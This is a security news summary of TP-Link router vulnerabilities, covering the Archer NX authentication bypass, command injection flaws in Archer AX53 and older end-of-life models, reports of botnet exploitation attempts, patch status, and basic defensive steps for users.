TP-Link Vulnerability - Critical Router Auth Bypass Flaw

The Flaw

TP-Link has recently released patches for several vulnerabilities in its Archer NX router series, most notably a critical flaw tracked as CVE-2025-15517. This vulnerability allows attackers to bypass authentication checks, enabling them to perform privileged actions without needing to log in. Specifically, the flaw arises from a missing authentication check in the HTTP server for certain CGI endpoints, which were intended for authenticated users only. This oversight can lead to unauthorized firmware uploads and configuration changes, putting users at significant risk.

In addition to this critical flaw, TP-Link addressed other vulnerabilities, including a hardcoded cryptographic key issue (CVE-2025-15605) and two command injection vulnerabilities (CVE-2025-15518 and CVE-2025-15519). These issues could allow authenticated attackers to decrypt configuration files and execute arbitrary commands, further compromising the security of the devices.

Newly discovered vulnerabilities have also been identified in the TP-Link Archer AX53 v1.0 model, which is widely used internationally. These include two high-severity OS command injection flaws (CVE-2026-30815 and CVE-2026-30818) that allow attackers on the same network to execute system commands and potentially take full control of the device. Additionally, a stack-based buffer overflow vulnerability (CVE-2026-30814) can cause system crashes and provide a pathway for arbitrary code execution. Other vulnerabilities (CVE-2026-30816 and CVE-2026-30817) expose sensitive configuration files, which could be exploited for further attacks.

Active Exploitation of Older Models

Recent reports have highlighted that several end-of-life TP-Link Wi-Fi router models, including the TL-WR940N, TL-WR740N, and TL-WR841N, are actively being targeted by hackers attempting to exploit a vulnerability tracked as CVE-2023-33538. This command injection vulnerability, which has a CVSS score of 8.8, allows attackers to inject commands through a poorly secured HTTP GET request parameter, enabling them to execute arbitrary commands on the router without proper authentication. Despite over a year of exploitation attempts, no successful exploitation has been reported.

Telemetry data from Palo Alto Networks indicates that large-scale automated scans and probes have been detected since June 2025, coinciding with the vulnerability's addition to the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) Catalog. The observed payloads resemble malware commonly associated with Mirai-style botnets, indicating attempts to download and run harmful software on the routers. Researchers noted that access credentials for the router's web management interface are required to successfully exploit the flaw, emphasizing the need for users to avoid using default login credentials. Although the exploit attempts observed were flawed, they confirm the underlying vulnerability's existence and potential for exploitation.

Palo Alto Networks' analysis revealed that the exploitation attempts were largely ineffective due to several factors, including the attackers targeting the wrong parameter and relying on outdated utilities not present in the router's limited BusyBox environment. This demonstrates a gap between the theoretical vulnerability and its practical exploitation, with the attackers' methods failing to compromise the router environment effectively.

Evolving Threat Landscape

Security experts are warning that the threat landscape surrounding these vulnerabilities is evolving. Attackers are increasingly employing sophisticated techniques, such as leveraging multi-stage exploits and automated tools to bypass security measures. This trend underscores the importance of maintaining updated firmware and vigilant monitoring of network activity.

What's at Risk

The affected devices include the Archer NX200, NX210, NX500, NX600, and the Archer AX53 v1.0 models, as well as older models like the TL-WR940N, TL-WR740N, and TL-WR841N. With millions of these routers in use, the potential impact is substantial. If exploited, attackers could gain full control over the router, leading to data breaches, unauthorized access to personal information, and manipulation of network traffic. This could also facilitate further attacks on connected devices within the home or business network.

TP-Link has strongly recommended that users update to the latest firmware version to mitigate these risks. Failure to do so could leave devices vulnerable to exploitation, and the company has stated that it cannot be held responsible for any consequences resulting from unpatched devices.

Patch Status

TP-Link has acted quickly to address these vulnerabilities, releasing security updates shortly after the flaws were discovered. Users are encouraged to check their router settings and ensure they have installed the latest firmware updates. The company has emphasized the importance of taking these actions to protect against potential attacks that could exploit these vulnerabilities. However, for the older models affected by CVE-2023-33538, TP-Link has confirmed that no further patches will be provided as these devices are considered end-of-life.

Immediate Actions

To protect yourself and your network, follow these steps:

1. Update your router firmware immediately to the latest version provided by TP-Link.
2. Review your router settings to ensure no unauthorized changes have been made.
3. Monitor your network traffic for any unusual activity that could indicate a breach.
4. Consider changing your router's default credentials to strengthen security.
5. Replace any end-of-life TP-Link models with currently supported hardware to avoid security risks.

By taking these precautions, users can significantly reduce the risk of falling victim to attacks exploiting these critical vulnerabilities.